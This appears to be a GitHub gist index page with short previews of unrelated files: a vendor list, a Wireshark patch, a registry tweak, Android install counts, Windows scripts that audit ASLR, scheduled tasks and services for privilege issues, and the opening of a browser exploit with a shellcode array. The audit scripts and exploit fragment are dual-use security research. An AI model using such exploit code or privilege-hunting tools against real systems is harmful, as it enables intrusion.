This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
AMPAK Technology, Inc. | |
ASUSTek COMPUTER INC. | |
AzureWave Technology Inc. | |
BizLink (Kunshan) Co.,Ltd | |
Chicony Electronics Co., Ltd. | |
Digital Data Communications Asia Co.,Ltd | |
GOOD WAY IND. CO., LTD. | |
HUAWEI TECHNOLOGIES CO.,LTD | |
Hon Hai Precision Ind. Co.,Ltd. | |
Intel Corporate |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--- packet-tpkt.c.orig 2019-06-21 14:47:47.831026881 +0000 | |
+++ packet-tpkt.c 2019-06-21 15:05:31.115056289 +0000 | |
@@ -22,6 +22,7 @@ | |
#include <epan/show_exception.h> | |
#include "packet-tpkt.h" | |
+#include "packet-tls.h" | |
void proto_register_tpkt(void); | |
void proto_reg_handoff_tpkt(void); | |
@@ -42,6 +43,7 @@ | |
static gboolean tpkt_desegment = TRUE; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[-HKEY_CLASSES_ROOT\.iso] | |
[-HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount\command] | |
[-HKEY_CLASSES_ROOT\.img] | |
[-HKEY_CLASSES_ROOT\.vhdx] |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
com.whatsapp 1000000000 | |
com.lenovo.anyshare.gps 1000000000 | |
com.instagram.android 1000000000 | |
com.zhiliaoapp.musically 500000000 | |
com.viber.voip 500000000 | |
wp.wattpad 100000000 | |
vStudio.Android.Camera360 100000000 | |
vsin.t16_funny_photo 100000000 | |
com.yahoo.mobile.client.android.mail 100000000 | |
com.xvideostudio.videoeditor 100000000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
''' | |
Utility to check for processes running with non-ASLR-compatible components. | |
Run with Administrative privileges to get visibility into all processes. | |
(1a) psutil: https://pypi.org/project/psutil/ | |
Installed via PIP | |
-OR- | |
(1b) Sysinternals ListDLLs: https://docs.microsoft.com/en-us/sysinternals/downloads/listdlls |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# DON'T USE THIS VERSION! | |
# Try https://gist.github.com/wdormann/89ed779933fe205fb52ecf3eacf5ff40 instead | |
import os | |
import subprocess | |
# See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/ | |
svcinfo = {} | |
FNULL = open(os.devnull, 'w') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Don't use this version! | |
# Try https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c instead | |
# | |
# Utility for listing SYSTEM-privileged scheduled tasks on Windows | |
# Tasks that come with Windows 10 are not included. | |
# Admin privileges are required to list all scheduled tasks. | |
import csv | |
import subprocess | |
import tempfile |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$win10_builtin = @('AppVClient', 'ClickToRunSvc', 'COMSysApp', 'diagnosticshub.standardcollector.service', | |
'msiserver', 'ose', 'perceptionsimulation', 'SecurityHealthService', 'Sense', | |
'SensorDataService', 'SgrmBroker', 'Spooler', 'ssh-agent', 'TieringEngineService', | |
'TrustedInstaller', 'UevAgentService', 'vds', 'VSS', 'wbengine', 'WinDefend', 'wmiApSrv', | |
'WSearch', 'XboxNetApiSvc', 'XboxGipSvc', 'XblGameSave', 'XblAuthManager', 'WwanSvc', 'wuauserv', | |
'WwanSvc', 'wuauserv', 'WpnService', 'WPDBusEnum', 'WpcMonSvc', 'WManSvc', 'wlidsvc', 'WlanSvc', | |
'wisvc', 'Winmgmt', 'WiaRpc', 'WerSvc', 'wercplsupport', 'WdiSystemHost', 'WbioSrvc', 'WalletService', | |
'WaaSMedicSvc', 'vmvss', 'vmicvss', 'vmicvmsession', 'vmicshutdown', 'vmicrdv', 'vmickvpexchange', | |
'vmicheartbeat', 'vmicguestinterface', 'VaultSvc', 'UsoSvc', 'UserManager', 'UmRdpService', | |
'TroubleshootingSvc', 'TrkWks', 'TokenBroker', 'Themes', 'TabletInputService', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()) | |
if (-Not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { | |
Write-Warning "We don't have elevated privileges. The following results may not be complete." | |
} | |
schtasks /query /fo csv -v | ConvertFrom-Csv | ? {$_.Status -notlike "Disabled" -and $_.TaskName -notlike "\Microsoft\Windows\*" -and $_.TaskName -notlike "\Microsoft\Office\*" -and $_.TaskName -notlike "\Microsoft\XblGameSave\*" -and $_.TaskName -notlike "TaskName" -and ($_."Run As User" -like "*system" -or $_."Run As User" -like "Administrator*")} | fl taskname,"Comment","Task To Run","Run As User" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
function gc() { | |
for (var i = 0; i < 0x80000; ++i) { | |
var a = new ArrayBuffer(); | |
} | |
} | |
let shellcode = [ | |
// Move x18 to x28 (TEB) |